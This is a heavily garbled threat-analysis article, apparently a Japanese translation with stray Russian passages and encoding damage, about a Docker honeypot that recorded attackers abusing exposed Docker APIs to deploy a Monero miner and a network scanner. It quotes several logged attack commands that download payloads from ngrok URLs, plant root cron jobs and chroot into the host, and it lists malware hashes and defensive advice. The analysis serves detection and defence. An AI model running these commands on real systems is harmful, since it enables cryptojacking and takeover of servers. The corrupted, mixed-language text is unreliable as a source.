
ç§ãã¡ã¯ãè åšã远跡ããããã«äœæãããããŒããã ã³ã³ããã䜿çšããŠåéãããããŒã¿ãåæããŸããã ãŸããDocker Hub äžã®ã³ãã¥ããã£å ¬éã€ã¡ãŒãžã䜿çšããŠãäžæ£ãªã³ã³ãããšããŠãããã€ããããæãŸãããªãããŸãã¯æªæ¿èªã®æå·é貚ãã€ããŒã«ããé倧ãªã¢ã¯ãã£ããã£ãæ€åºããŸããã ãã®ã€ã¡ãŒãžã¯ãæªæã®ããä»®æ³é貚ãã€ããŒãé ä¿¡ãããµãŒãã¹ã®äžéšãšããŠäœ¿çšãããŸãã
ããã«ããªãŒãã³ãªé£æ¥ããã³ã³ãããŒãã¢ããªã±ãŒã·ã§ã³ã«äŸµå ¥ããããã«ããããã¯ãŒã¯ãæäœããããã®ããã°ã©ã ãã€ã³ã¹ããŒã«ãããŸãã
ãããŒãããããã®ãŸãŸãã€ãŸãããã©ã«ãèšå®ã®ãŸãŸã«ããã»ãã¥ãªãã£å¯Ÿçããã®åŸã®è¿œå ãœãããŠã§ã¢ã®ã€ã³ã¹ããŒã«ã¯è¡ããŸããã Docker ã«ã¯ããšã©ãŒãåçŽãªè匱æ§ãåé¿ããããã®åæã»ããã¢ããã«é¢ããæšå¥šäºé ãããããšã«æ³šæããŠãã ããã ãã ãã䜿çšããããããŒãããã¯ã³ã³ããã§ãããã³ã³ããå ã®ã¢ããªã±ãŒã·ã§ã³ã§ã¯ãªããã³ã³ããåãã©ãããã©ãŒã ãçã£ãæ»æãæ€åºããããã«èšèšãããŠããŸãã
æ€åºãããæªæã®ããã¢ã¯ãã£ããã£ã¯ãè匱æ§ãå¿ èŠãšãããDocker ã®ããŒãžã§ã³ã«ãäŸåããªããããæ³šç®ã«å€ããŸãã æ»æè ã倿°ã®ãªãŒãã³ ãµãŒããŒã«ææããããã«å¿ èŠãªã®ã¯ãæ£ããæ§æãããŠããªããªãŒãã³ãªã³ã³ãã ã€ã¡ãŒãžãèŠã€ããããšã ãã§ãã
éã¯ããŒãºãã® Docker API ã䜿çšãããšããŠãŒã¶ãŒã¯ããŸããŸãªåŠçãå®è¡ã§ããŸãã ããã«ã¯ãå®è¡äžã®ã³ã³ãããŒã®ãªã¹ãã®ååŸãç¹å®ã®ã³ã³ãããŒããã®ãã°ã®ååŸãéå§ã忢 (匷å¶ãå«ã)ãããã«ã¯æå®ãããèšå®ãæã€ç¹å®ã®ã€ã¡ãŒãžããã®æ°ããã³ã³ãããŒã®äœæãå«ãŸããŸãã

å·ŠåŽã¯ãã«ãŠã§ã¢ã®é
ä¿¡æ¹æ³ã§ãã å³åŽã¯æ»æè
ã®ç°å¢ã§ãã€ã¡ãŒãžã®ãªã¢ãŒãããŒã«ã¢ãŠããå¯èœã«ããŸãã

3762 ã®ãªãŒãã³ Docker API ã®åœå¥ã®ååžã 12.02.2019 幎 XNUMX æ XNUMX æ¥ä»ãã® Shodan æ€çŽ¢ã«åºã¥ã
æ»æãã§ãŒã³ãšãã€ããŒãã®ãªãã·ã§ã³
æªæã®ããã¢ã¯ãã£ããã£ã¯ãããŒãããã®å©ãã ãã§æ€åºãããããã§ã¯ãããŸããã Shodan ããã®ããŒã¿ã¯ãMonero æå·é貚ãã€ãã³ã° ãœãããŠã§ã¢ããããã€ããããã®ããªããžãšããŠäœ¿çšãããæ§æãééã£ãŠããã³ã³ããã調æ»ããŠä»¥æ¥ãå ¬éãããŠãã Docker API (2018 çªç®ã®ã°ã©ããåç §) ã®æ°ãå¢å ããŠããããšã瀺ããŠããŸãã æšå¹ŽXNUMXæïŒXNUMX幎çŸåšããŒã¿ïŒ çŽã 翻蚳è ) ãªãŒãã³ API 㯠856 åãããããŸããã§ããã
ãããŒãããã®ãã°ã調æ»ãããšãããã³ã³ãã㌠ã€ã¡ãŒãžã®äœ¿çšãã ãå®å šãªæ¥ç¶ã確ç«ããããå ¬çã«ã¢ã¯ã»ã¹å¯èœãªãã€ã³ãããæå®ãããã¢ãã¬ã¹ãŸãã¯ãªãœãŒã¹ (ããŒã«ã«ãã¹ããªã©) ã«ãã©ãã£ãã¯ã転éãããããããã®ããŒã«ã§ãã ããã«ãããæ»æè ã¯ãªãŒãã³ ãµãŒããŒã«ãã€ããŒããé ä¿¡ãããšãã« URL ãåçã«äœæã§ããŸãã 以äžã¯ãngrok ãµãŒãã¹ã®æªçšã瀺ããã°ã®ã³ãŒãäŸã§ãã
Tty: false
Command: â-c curl âretry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ,
Tty: false,
Cmd: â-c curl âretry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c âcron || crondââ,
Entrypoint: â/bin/shâã芧ã®ãšãããã¢ããããŒãããããã¡ã€ã«ã¯åžžã«å€åãã URL ããããŠã³ããŒããããŸãã ãããã® URL ã®æå¹æéã¯çããããæå¹æéãéãããšãã€ããŒããããŠã³ããŒãã§ããªããªããŸãã
ÐÑÑÑ ÐŽÐ²Ð° ваÑОаМÑа пПлезМПй МагÑÑзкО. ÐеÑвÑй â ÑкПЌпОлОÑПваММÑй ÐŒÐ°Ð¹ÐœÐµÑ Ð² ÑПÑЌаÑе ELF ÐŽÐ»Ñ Linux (ПпÑеЎелÑеЌÑй как Coinminer.SH.MALXMR.ATNO), кПÑПÑÑй пПЎклÑÑаеÑÑÑ Ðº пÑÐ»Ñ ÐŽÐ»Ñ ÐŒÐ°Ð¹ÐœÐžÐœÐ³Ð°. ÐÑПÑПй â ÑкÑÐžÐ¿Ñ (TrojanSpy.SH.ZNETMAP.A), пÑеЎМазМаÑеММÑй ÐŽÐ»Ñ Ð¿ÐŸÐ»ÑÑÐµÐœÐžÑ ÐŸÐ¿ÑеЎелеММÑÑ ÑеÑевÑÑ ÐžÐœÑÑÑÑЌеМÑПв, ОÑпПлÑзÑеЌÑÑ ÐŽÐ»Ñ ÑкаМОÑÐŸÐ²Ð°ÐœÐžÑ ÑеÑевÑÑ ÐŽÐžÐ°Ð¿Ð°Ð·ÐŸÐœÐŸÐ² О пПÑлеЎÑÑÑегП пПОÑка МПвÑÑ Ñелей.
ãããã㌠ã¹ã¯ãªãã㯠XNUMX ã€ã®å€æ°ãèšå®ãããããã¯æå·é貚ãã€ããŒã®ãããã€ã«äœ¿çšãããŸãã HOST 倿°ã«ã¯æªæã®ãããã¡ã€ã«ãé 眮ãããŠãã URL ãå«ãŸããŠãããRIP 倿°ã¯ãããã€ããããã€ããŒã®ãã¡ã€ã«å (å®éã«ã¯ããã·ã¥) ã§ãã HOST 倿°ã¯ãããã·ã¥å€æ°ã倿Žããããã³ã«å€æŽãããŸãã ãã®ã¹ã¯ãªããã¯ãæ»æããããµãŒããŒäžã§ä»ã®ä»®æ³é貚ãã€ããŒãå®è¡ãããŠããªãããšã確èªããããšããŸãã

HOST 倿°ãš RIP 倿°ã®äŸãããã³ä»ã®ãã€ããŒãå®è¡ãããŠããªãããšã確èªããããã«äœ¿çšãããã³ãŒã ã¹ãããã
ÐÑежЎе ÑеЌ запÑÑкаÑÑ ÐŒÐ°Ð¹ÐœÐµÑ, ПМ пеÑеОЌеМПвÑваеÑÑÑ Ð² nginx. ÐÑÑгОе веÑÑОО ÑÑПгП ÑкÑОпÑа пеÑеОЌеМПвÑваÑÑ ÐŒÐ°Ð¹ÐœÐµÑ Ð² ÐŽÑÑгОе легОÑОЌМÑе ÑеÑвОÑÑ, кПÑПÑÑе ЌПгÑÑ Ð¿ÑОÑÑÑÑÑвПваÑÑ Ð² ПкÑÑжеМОÑÑ Linux. ÐÑПгП ПбÑÑМП ЎПÑÑаÑПÑМП ÐŽÐ»Ñ ÐŸÐ±Ñ ÐŸÐŽÐ° пÑПвеÑПк пП ÑпОÑÐºÑ Ð·Ð°Ð¿ÑÑеММÑÑ Ð¿ÑПÑеÑÑПв.
æ€çŽ¢ã¹ã¯ãªããã«ãæ©èœããããŸãã åã URL ãµãŒãã¹ãšé£æºããŠå¿ èŠãªããŒã«ãå±éããŸãã ãã®äžã«ã¯ããããã¯ãŒã¯ãã¹ãã£ã³ããŠéããŠããããŒãã®ãªã¹ããååŸããããã«äœ¿çšããã zmap ãã€ããªããããŸãã ãã®ã¹ã¯ãªããã¯ãèŠã€ãã£ããµãŒãã¹ãšå¯Ÿè©±ãããµãŒãã¹ãããããŒãåä¿¡ããŠââãèŠã€ãã£ããµãŒãã¹ã«é¢ããè¿œå æ å ± (ããŒãžã§ã³ãªã©) ã確èªããããã«äœ¿çšãããå¥ã®ãã€ããªãèªã¿èŸŒã¿ãŸãã
ãã®ã¹ã¯ãªããã§ã¯ãã¹ãã£ã³ããããã€ãã®ãããã¯ãŒã¯ç¯å²ãäºåã«æ±ºå®ãããŸãããããã¯ã¹ã¯ãªããã®ããŒãžã§ã³ã«ãã£ãŠç°ãªããŸãã ãŸããã¹ãã£ã³ãå®è¡ããåã«ããµãŒãã¹ (ãã®å Žå㯠Docker) ããã¿ãŒã²ãã ããŒããèšå®ããŸãã
Ðак ÑПлÑкП ÐœÐ°Ð¹ÐŽÐµÐœÑ Ð¿ÑеЎпПлагаеЌÑе ÑелО â авÑПЌаÑОÑеÑкО Оз ÐœÐžÑ ÑМОЌаÑÑÑÑ Ð±Ð°ÐœÐœÐµÑÑ. СкÑÐžÐ¿Ñ Ñакже ÑОлÑÑÑÑÐµÑ ÑелО в завОÑОЌПÑÑО ÐŸÑ ÐžÐœÑеÑеÑÑÑÑÐžÑ ÐµÐ³ÐŸ ÑеÑвОÑПв, пÑОлПжеМОй, кПЌпПМеМÑПв ОлО плаÑÑПÑÐŒ: Redis, Jenkins, Drupal, MODX, ãDocker 1.16 ã¯ã©ã€ã¢ã³ããš Apache CouchDBã ã¹ãã£ã³ããããµãŒããŒããããã®ããããã«äžèŽããå Žåãããã¯ããã¹ã ãã¡ã€ã«ã«ä¿åãããæ»æè ã¯ãã®åŸã®åæããããã³ã°ã«ããã䜿çšã§ããŸãã ãããã®ããã¹ã ãã¡ã€ã«ã¯ãåçãªã³ã¯ãä»ããŠæ»æè ã®ãµãŒããŒã«ã¢ããããŒããããŸãã ã€ãŸãããã¡ã€ã«ããšã«å¥ã® URL ã䜿çšãããããã以éã®ã¢ã¯ã»ã¹ã¯å°é£ã«ãªããŸãã
次㮠XNUMX ã€ã®ã³ãŒãã§ãããããã«ãæ»æãã¯ãã«ã¯ Docker ã€ã¡ãŒãžã§ãã

äžéšã¯æ£èŠã®ãµãŒãã¹ãžã®åå倿Žãäžéšã¯ãããã¯ãŒã¯ã®ã¹ãã£ã³ã« zmap ã䜿çšãããæ¹æ³ã瀺ããŠããŸãã

äžéšã«ã¯äºåå®çŸ©ããããããã¯ãŒã¯ç¯å²ããããäžéšã«ã¯ Docker ãªã©ã®ãµãŒãã¹ãæ€çŽ¢ããããã®ç¹å®ã®ããŒãããããŸãã

ã¹ã¯ãªãŒã³ã·ã§ããã¯ãã¢ã«ãã€ã³ ã«ãŒã«ã®ç»åã 10 äžå以äžããŠã³ããŒããããããšã瀺ããŠããŸã
Ðа ПÑМПве Alpine Linux О curl, ÑеÑÑÑÑПÑÑÑекÑОвМПгП ОМÑÑÑÑЌеМÑа CLI ÐŽÐ»Ñ Ð¿ÐµÑеЎаÑО ÑайлПв пП ÑазлОÑМÑÐŒ пÑПÑПкПлаЌ, ЌПжМП ÑПбÑаÑÑ ã åã®ç»åãããããããã«ããã®ç»åã¯ãã§ã« 10 äžå以äžããŠã³ããŒããããŠããŸãã 倧éã®ããŠã³ããŒãã¯ããã®ã€ã¡ãŒãžããšã³ã㪠ãã€ã³ããšããŠäœ¿çšããŠããããšãæå³ããŠããå¯èœæ§ããããŸãããã®ã€ã¡ãŒãžã¯ XNUMX ãæä»¥äžåã«æŽæ°ãããŠããããŠãŒã¶ãŒã¯ãã®ãªããžããªããä»ã®ã€ã¡ãŒãžãããã»ã©é »ç¹ã«ããŠã³ããŒãããŠããŸããã ããã«ãŒå - ã³ã³ãããå®è¡ããããã«æ§æããããã«äœ¿çšãããäžé£ã®åœä»€ã ãšã³ã㪠ãã€ã³ãã®èšå®ãæ£ãããªãå Žå (ããšãã°ãã³ã³ãããŒãã€ã³ã¿ãŒãããããéãããŸãŸã«ãªã£ãŠããå Žå)ãã€ã¡ãŒãžãæ»æãã¯ãã«ãšããŠäœ¿çšãããå¯èœæ§ããããŸãã æ»æè ã¯ãæ§æãééã£ãŠãããããµããŒããããŠããªãã³ã³ãããéããŠããããšãçºèŠããå Žåãããã䜿çšããŠãã€ããŒããé ä¿¡ããå¯èœæ§ããããŸãã
ãã®ã€ã¡ãŒãž (alpine-curl) èªäœã¯æªæã®ãããã®ã§ã¯ãããŸããããäžã§èŠãããã«ãæªæã®ããæ©èœãå®è¡ããããã«äœ¿çšãããå¯èœæ§ãããããšã«æ³šæããããšãéèŠã§ãã åæ§ã® Docker ã€ã¡ãŒãžã䜿çšããŠãæªæã®ããã¢ã¯ãã£ããã£ãå®è¡ããããšãã§ããŸãã ç§ãã¡ã¯ Docker ã«é£çµ¡ãããã®åé¡ã«ã€ããŠååããŸããã
æèš
éºäœ å€ãã®äŒæ¥ãç¹ã«å°å ¥ããŠããäŒæ¥ã«ãšã£ãŠ ãè¿ éãªéçºãšé ä¿¡ã«éç¹ã眮ããŠããŸãã ç£æ»ãšç£èŠã®ã«ãŒã«ã«æºæ ããå¿ èŠæ§ãããŒã¿ã®æ©å¯æ§ãç£èŠããå¿ èŠæ§ãããã«ãããã®äžéµå®ã«ããå€å€§ãªæå®³ã«ãã£ãŠããã¹ãŠãããã«æªåããŸãã ã»ãã¥ãªãã£ã®èªååãéçºã©ã€ããµã€ã¯ã«ã«çµã¿èŸŒããšãæ€åºãããªãå¯èœæ§ã®ããã»ãã¥ãªã㣠ããŒã«ãçºèŠã§ããã ãã§ãªããã¢ããªã±ãŒã·ã§ã³ã®ãããã€åŸã«çºèŠãããè匱æ§ãæ§æãã¹ããšã«è¿œå ã®ãœãããŠã§ã¢ ãã«ããå®è¡ãããªã©ãäžå¿ èŠãªäœæ¥è² è·ã軜æžããããšãã§ããŸãã
ãã®èšäºã§èª¬æããäºä»¶ã¯ãæ¬¡ã®æšå¥šäºé ãå«ããæåããå®å šãèæ ®ããå¿ èŠæ§ã匷調ããŠããŸãã
- ã·ã¹ãã 管çè ããã³éçºè ã®å Žå: API èšå®ãåžžã«ãã§ãã¯ããŠãç¹å®ã®ãµãŒããŒãŸãã¯å éšãããã¯ãŒã¯ããã®ãªã¯ãšã¹ãã®ã¿ãåãå ¥ããããã«ãã¹ãŠãæ§æãããŠããããšã確èªããŠãã ããã
- æå°æš©éã®ååã«åŸããŸããã³ã³ãã ã€ã¡ãŒãžã眲åããã³æ€èšŒãããŠããããšã確èªããéèŠãªã³ã³ããŒãã³ã (ã³ã³ããèµ·åãµãŒãã¹) ãžã®ã¢ã¯ã»ã¹ãå¶éãããããã¯ãŒã¯æ¥ç¶ã«æå·åã远å ããŸãã
- åŸã ã»ãã¥ãªãã£ã¡ã«ããºã ãæå¹ã«ããŸãã ãããŠå èµã® .
- ã©ã³ã¿ã€ã ãšã€ã¡ãŒãžã®èªåã¹ãã£ã³ã䜿çšããŠãã³ã³ããå ã§å®è¡ãããŠããããã»ã¹ã«é¢ããè¿œå æ å ±ãååŸããŸã (ã¹ããŒãã£ã³ã°ã®æ€åºãè匱æ§ã®æ€çŽ¢ãªã©)ã ã¢ããªã±ãŒã·ã§ã³å¶åŸ¡ãšæŽåæ§ç£èŠã¯ããµãŒããŒããã¡ã€ã«ãããã³ã·ã¹ãã é åã«å¯Ÿããç°åžžãªå€æŽã远跡ããã®ã«åœ¹ç«ã¡ãŸãã
ãã¬ã³ããã€ã¯ãã¯ãDevOps ããŒã ãå®å šã«æ§ç¯ããè¿ éã«å±éããã©ãã§ãèµ·åã§ããããã«æ¯æŽããŸãã ãã¬ã³ããã€ã¯ã çµç¹ã® DevOps ãã€ãã©ã€ã³å šäœã«åŒ·åãã€åçåãããèªååãããã»ãã¥ãªãã£ãæäŸããè€æ°ã®è åšé²åŸ¡ãæäŸããŸã å®è¡æã«ç©çãä»®æ³ãã¯ã©ãŠãã®ã¯ãŒã¯ããŒããä¿è·ããŸãã ãŸããã³ã³ããã®ã»ãã¥ãªãã£ã远å ããŸãã О ãéçºãã€ãã©ã€ã³ã®ä»»æã®æç¹ã§ Docker ã³ã³ãã ã€ã¡ãŒãžãã¹ãã£ã³ããŠãã«ãŠã§ã¢ãè匱æ§ãæ€åºããè åšãå±éãããåã«é»æ¢ããŸãã
劥åã®å å
é¢é£ããããã·ã¥:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Ðа å®è·µçãªè¬æŒè ã¯ãäžèšã®ç¶æ³ã®çºçã®å¯èœæ§ãæå°éã«æãããå®å šã«åé¿ããããã«ãæåã«ã©ã®ãããªèšå®ãè¡ãå¿ èŠããããã瀺ããŸãã ãããŠã19æ21æ¥ãšXNUMXæ¥ã«ã¯ãªã³ã©ã€ã³éäžè¬çŸ©ãè¡ãããŸããã ãããã®ã»ãã¥ãªãã£åé¡ãåæ§ã®ã»ãã¥ãªãã£åé¡ã«ã€ããŠãååãçŸåœ¹ã®æåž«ãšã©ãŠã³ã ããŒãã«ã§è©±ãåãããšãã§ããŸããããã§ã¯ã誰ãã声ãäžããçµéšè±å¯ãªååã®èŠåŽãæåã®è©±ã«è³ãåŸããããšãã§ããŸãã
åºæïŒ habr.com
